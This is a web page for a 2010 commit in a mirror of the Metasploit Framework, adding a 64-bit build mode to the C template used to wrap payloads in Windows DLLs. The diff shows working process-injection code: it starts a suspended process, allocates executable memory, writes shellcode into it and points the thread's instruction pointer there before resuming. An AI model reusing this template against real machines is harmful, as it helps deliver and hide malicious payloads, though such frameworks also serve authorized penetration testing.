infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

add a 64-bit compile mode for pe/dll 

git-svn-id: file:///home/svn/framework3/trunk@10063 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Joshua Drake 2010-08-19 20:49:12 +00:00
parent 5b6f110efa
commit 41382b503b
1 changed files with 23 additions and 4 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

27
data/templates/src/pe/dll/template.c
View File

@ -1,6 +1,19 @@
#include <windows.h> #include <windows.h>
#include "template.h" #include "template.h"
#if BUILDMODE == 2
/* hand-rolled bzero allows us to avoid including ms vc runtime */
void inline_bzero(void *p, size_t l)
{
BYTE *q = (BYTE *)p;
size_t x = 0;
for (x = 0; x < l; x++)
*(q++) = 0x00;
}
#endif
void ExecutePayload(void); void ExecutePayload(void);
@ -33,10 +46,11 @@ void ExecutePayload(void) {
PROCESS_INFORMATION pi; PROCESS_INFORMATION pi;
STARTUPINFO si; STARTUPINFO si;
CONTEXT ctx; CONTEXT ctx;
DWORD ep, prot; DWORD prot;
LPVOID ep;
// Start up the payload in a new process // Start up the payload in a new process
ZeroMemory( &si, sizeof( si )); inline_bzero( &si, sizeof( si ));
si.cb = sizeof(si); si.cb = sizeof(si);
// Create a suspended process, write shellcode into stack, make stack RWX, resume it // Create a suspended process, write shellcode into stack, make stack RWX, resume it
@ -44,11 +58,16 @@ void ExecutePayload(void) {
ctx.ContextFlags = CONTEXT_INTEGER|CONTEXT_CONTROL; ctx.ContextFlags = CONTEXT_INTEGER|CONTEXT_CONTROL;
GetThreadContext(pi.hThread, &ctx); GetThreadContext(pi.hThread, &ctx);
ep = (DWORD) VirtualAllocEx(pi.hProcess, NULL, SCSIZE, MEM_COMMIT, PAGE_EXECUTE_READWRITE); ep = (LPVOID) VirtualAllocEx(pi.hProcess, NULL, SCSIZE, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
WriteProcessMemory(pi.hProcess,(PVOID)ep, &code, SCSIZE, 0); WriteProcessMemory(pi.hProcess,(PVOID)ep, &code, SCSIZE, 0);
ctx.Eip = ep; #ifdef _WIN64
ctx.Rip = (DWORD64)ep;
#else
ctx.Eip = (DWORD)ep;
#endif
SetThreadContext(pi.hThread,&ctx); SetThreadContext(pi.hThread,&ctx);
ResumeThread(pi.hThread); ResumeThread(pi.hThread);